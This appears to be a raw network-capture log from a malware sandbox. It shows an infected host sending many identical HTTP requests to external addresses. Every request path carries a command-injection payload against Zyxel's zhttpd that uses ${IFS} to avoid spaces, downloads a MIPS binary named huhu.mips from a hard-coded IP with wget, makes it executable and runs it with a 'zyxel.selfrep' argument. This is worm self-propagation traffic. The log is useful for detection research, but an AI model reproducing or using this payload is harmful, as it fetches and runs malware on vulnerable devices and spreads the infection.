                                                  Jan 19, 2024 18:23:50.957796097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3225192.168.2.1345942196.184.48.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.957847118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3226192.168.2.135364279.141.91.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.957895994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3227192.168.2.1350856100.133.182.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.957920074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3228192.168.2.1345532193.211.176.129443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.957978964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3229192.168.2.1343834143.119.181.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.957998037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3230192.168.2.1357154201.226.88.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.958059072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3231192.168.2.1356280120.106.112.66443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.958082914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3232192.168.2.1350090209.108.35.141443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.958129883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3233192.168.2.1342558198.214.19.202443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.958178997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3234192.168.2.135995018.85.97.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.958204985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3235192.168.2.135348831.81.98.235443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.958246946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3236192.168.2.1340776209.56.38.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.958278894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3237192.168.2.134793281.230.143.140443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.958322048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3238192.168.2.135376477.253.233.58443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.958363056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3239192.168.2.136008293.243.183.28443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.958405018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3240192.168.2.1347622101.57.75.68443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.958436966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3241192.168.2.1354154208.186.47.83443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.958502054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3242192.168.2.134415019.149.213.31443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.958519936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3243192.168.2.133888096.80.87.192443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.958573103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3244192.168.2.136017467.134.17.153443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.958601952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3245192.168.2.1347766175.87.235.9443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.958642960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3246192.168.2.1333422104.238.120.9443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.958656073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3247192.168.2.136035214.61.65.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.958678961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3248192.168.2.1350494212.178.30.74443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.958751917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3249192.168.2.1348494186.66.135.177443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.958771944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3250192.168.2.1348190112.36.129.221443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.958914042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3251192.168.2.1342896105.90.98.139443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.958940029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3252192.168.2.133299860.211.69.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.958986998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3253192.168.2.1344834211.233.147.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.959011078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3254192.168.2.134499466.130.25.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.959038019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3255192.168.2.1352650183.137.22.193443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.959104061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3256192.168.2.1360418208.198.254.233443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.959126949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3257192.168.2.1334348202.38.188.210443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.959184885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3258192.168.2.134712099.210.12.234443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.959211111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3259192.168.2.1355698192.174.236.236443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.959228992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3260192.168.2.1334716207.8.115.22443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.959285975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3261192.168.2.134607280.187.49.51443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.959335089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3262192.168.2.135737892.232.2.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.959369898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3263192.168.2.1349736114.233.84.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.959407091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3264192.168.2.134489219.60.199.135443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.959448099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3265192.168.2.1350830159.113.246.193443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.959458113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3266192.168.2.1351002132.68.230.151443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.959502935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3267192.168.2.1337582216.219.30.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.959536076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3268192.168.2.1339500165.95.32.160443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.959580898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3269192.168.2.133982466.246.252.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.959624052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3270192.168.2.1332856100.13.16.109443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.959669113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3271192.168.2.134455866.227.35.105443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.959703922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3272192.168.2.1356416195.174.74.211443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.959752083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3273192.168.2.134032442.187.151.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.959799051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3274192.168.2.1357966128.227.233.241443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.959837914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3275192.168.2.133861027.254.233.245443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.959861994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3276192.168.2.1339418148.123.117.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.959920883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3277192.168.2.1349350171.220.90.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.959956884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3278192.168.2.1333574126.99.192.45443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.960000038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3279192.168.2.13555748.145.57.171443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.960028887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3280192.168.2.135947437.181.189.215443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.960062981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3281192.168.2.1340912116.150.26.47443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.960086107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3282192.168.2.1340810176.136.242.140443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.960127115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3283192.168.2.1352696133.2.82.3443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.960156918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3284192.168.2.1357846128.238.185.108443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.960190058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3285192.168.2.1359132155.3.33.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.960257053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3286192.168.2.1347582137.201.80.156443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:50.960287094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3287192.168.2.136001213.9.85.122443
                                                  TimestampBytes transferredDirectionData
